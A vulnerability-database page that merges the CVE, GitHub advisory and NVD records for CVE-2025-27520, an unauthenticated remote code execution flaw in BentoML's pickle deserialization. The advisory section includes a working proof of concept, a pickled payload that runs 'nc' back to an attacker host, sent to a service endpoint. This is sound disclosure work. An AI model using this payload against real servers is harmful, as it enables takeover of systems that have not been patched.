CVE-2025-27520 (GCVE-0-2025-27520)
Vulnerability from cvelistv5 – Published: 2025-04-04 14:28 – Updated: 2025-04-04 14:51
VLAI?
Summary
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.
Severity ?
9.8 (Critical)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27520",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-04T14:51:28.686009Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-04T14:51:45.561Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "BentoML",
"vendor": "bentoml",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.3.4, \u003c 1.4.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-04T14:28:51.574Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
},
{
"name": "https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194"
}
],
"source": {
"advisory": "GHSA-33xw-247w-6hmc",
"discovery": "UNKNOWN"
},
"title": "BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27520",
"datePublished": "2025-04-04T14:28:51.574Z",
"dateReserved": "2025-02-26T18:11:52.307Z",
"dateUpdated": "2025-04-04T14:51:45.561Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-27520\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-04-04T15:15:47.927\",\"lastModified\":\"2025-06-27T12:48:46.350\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.\"},{\"lang\":\"es\",\"value\":\"BentoML es una librer\u00eda de Python para crear sistemas de servidores en l\u00ednea optimizados para aplicaciones de IA e inferencia de modelos. Se ha identificado una vulnerabilidad de Ejecuci\u00f3n Remota de C\u00f3digo (RCE) causada por una deserializaci\u00f3n insegura en la \u00faltima versi\u00f3n (v1.4.2) de BentoML. Esta vulnerabilidad permite a cualquier usuario no autenticado ejecutar c\u00f3digo arbitrario en el servidor. Existe un segmento de c\u00f3digo inseguro en serde.py. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.4.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.3.4\",\"versionEndIncluding\":\"1.4.2\",\"matchCriteriaId\":\"F824F6EC-4EA6-4C23-B174-2D8E5587E9E1\"}]}]}],\"references\":[{\"url\":\"https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-27520\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-04T14:51:28.686009Z\"}}}], \"references\": [{\"url\": \"https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-04T14:51:41.261Z\"}}], \"cna\": {\"title\": \"BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization\", \"source\": {\"advisory\": \"GHSA-33xw-247w-6hmc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"bentoml\", \"product\": \"BentoML\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.3.4, \u003c 1.4.3\"}]}], \"references\": [{\"url\": \"https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\", \"name\": \"https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194\", \"name\": \"https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-04-04T14:28:51.574Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-27520\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-04-04T14:51:45.561Z\", \"dateReserved\": \"2025-02-26T18:11:52.307Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-04-04T14:28:51.574Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-33XW-247W-6HMC
Vulnerability from github – Published: 2025-04-04 16:05 – Updated: 2025-04-04 16:05
VLAI?
Summary
BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization
Details
Summary
A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.
Details
It exists an unsafe code segment in serde.py:
def deserialize_value(self, payload: Payload) -> t.Any:
if "buffer-lengths" not in payload.metadata:
return pickle.loads(b"".join(payload.data))
Through data flow analysis, it is confirmed that the payloadcontent is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.
PoC
Environment:
- Server host:
- IP: 10.98.36.123
- OS: Ubuntu
- Attack host:
- IP: 10.98.36.121
-
OS: Ubuntu
-
Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.
1.1 Install BentoML (Server host: 10.98.36.123) :
pip install -U bentoml
1.2 Define APIs in a service.py file (Server host: 10.98.36.123) :
from __future__ import annotations
import bentoml
@bentoml.service(
resources={"cpu": "4"}
)
class Summarization:
def __init__(self) -> None:
import torch
from transformers import pipeline
device = "cuda" if torch.cuda.is_available() else "cpu"
self.pipeline = pipeline('summarization', device=device)
@bentoml.api(batchable=True)
def summarize(self, texts: list[str]) -> list[str]:
results = self.pipeline(texts)
return [item['summary_text'] for item in results]
1.3 Run the service code (Server host: 10.98.36.123) :
pip install torch transformers # additional dependencies for local run
bentoml serve
-
Start nc listening on the attacking host (Attack host: 10.98.36.121) :
nc -lvvp 1234 -
Send maliciously crafted request (Attack host: 10.98.36.121) :
import pickle
import os
import requests
headers = {'Content-Type': 'application/vnd.bentoml+pickle'}
class Evil:
def __reduce__(self):
return(os.system, ('nc 10.98.36.121 1234',))
payload = pickle.dumps(Evil())
requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)
- Attack success (Attack host: 10.98.36.121) :
The server host(10.98.36.123) has connected to the attacker's host(10.98.36.121) listening on port 1234.
Impact
Remote Code Execution (RCE).
Severity ?
9.8 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bentoml"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.4"
},
{
"fixed": "1.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27520"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-04T16:05:32Z",
"nvd_published_at": "2025-04-04T15:15:47Z",
"severity": "CRITICAL"
},
"details": "### Summary\nA Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.\n\n### Details\nIt exists an unsafe code segment in `serde.py`: \n```Python\ndef deserialize_value(self, payload: Payload) -\u003e t.Any:\n if \"buffer-lengths\" not in payload.metadata:\n return pickle.loads(b\"\".join(payload.data))\n```\nThrough data flow analysis, it is confirmed that the `payload `content is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.\n\n### PoC\nEnvironment:\n\n- Server host:\n - IP: 10.98.36.123\n - OS: Ubuntu \n- Attack host:\n - IP: 10.98.36.121\n - OS: Ubuntu \n\n\n\n1. Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.\n\n1.1 Install BentoML (Server host: 10.98.36.123) :\n` pip install -U bentoml`\n\n1.2 Define APIs in a `service.py` file (Server host: 10.98.36.123) :\n``` Python\nfrom __future__ import annotations\n\nimport bentoml\n\n@bentoml.service(\n resources={\"cpu\": \"4\"}\n)\nclass Summarization:\n def __init__(self) -\u003e None:\n import torch\n from transformers import pipeline\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.pipeline = pipeline(\u0027summarization\u0027, device=device)\n\n @bentoml.api(batchable=True)\n def summarize(self, texts: list[str]) -\u003e list[str]:\n results = self.pipeline(texts)\n return [item[\u0027summary_text\u0027] for item in results]\n```\n\n\n1.3 Run the service code (Server host: 10.98.36.123) :\n``` Bash\npip install torch transformers # additional dependencies for local run\n\nbentoml serve\n```\n\n\n2. Start nc listening on the attacking host (Attack host: 10.98.36.121) :\n`nc -lvvp 1234`\n\n3. Send maliciously crafted request (Attack host: 10.98.36.121) :\n``` Python\nimport pickle\nimport os\nimport requests\n\nheaders = {\u0027Content-Type\u0027: \u0027application/vnd.bentoml+pickle\u0027}\n\nclass Evil:\n def __reduce__(self):\n return(os.system, (\u0027nc 10.98.36.121 1234\u0027,))\n\npayload = pickle.dumps(Evil())\n\nrequests.post(\"http://10.98.36.123:3000/summarize\", data=payload, headers=headers)\n```\n\n\n4. Attack success (Attack host: 10.98.36.121) :\nThe server host(10.98.36.123) has connected to the attacker\u0027s host(10.98.36.121) listening on port 1234.\n\n\n\n\n### Impact\nRemote Code Execution (RCE).",
"id": "GHSA-33xw-247w-6hmc",
"modified": "2025-04-04T16:05:32Z",
"published": "2025-04-04T16:05:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27520"
},
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194"
},
{
"type": "PACKAGE",
"url": "https://github.com/bentoml/BentoML"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "BentoML Allows Remote Code Execution (RCE) via Insecure Deserialization"
}
FKIE_CVE-2025-27520
Vulnerability from fkie_nvd - Published: 2025-04-04 15:15 - Updated: 2025-06-27 12:48
Severity ?
Summary
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bentoml:bentoml:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F824F6EC-4EA6-4C23-B174-2D8E5587E9E1",
"versionEndIncluding": "1.4.2",
"versionStartIncluding": "1.3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version (v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server. It exists an unsafe code segment in serde.py. This vulnerability is fixed in 1.4.3."
},
{
"lang": "es",
"value": "BentoML es una librer\u00eda de Python para crear sistemas de servidores en l\u00ednea optimizados para aplicaciones de IA e inferencia de modelos. Se ha identificado una vulnerabilidad de Ejecuci\u00f3n Remota de C\u00f3digo (RCE) causada por una deserializaci\u00f3n insegura en la \u00faltima versi\u00f3n (v1.4.2) de BentoML. Esta vulnerabilidad permite a cualquier usuario no autenticado ejecutar c\u00f3digo arbitrario en el servidor. Existe un segmento de c\u00f3digo inseguro en serde.py. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.4.3."
}
],
"id": "CVE-2025-27520",
"lastModified": "2025-06-27T12:48:46.350",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-04-04T15:15:47.927",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…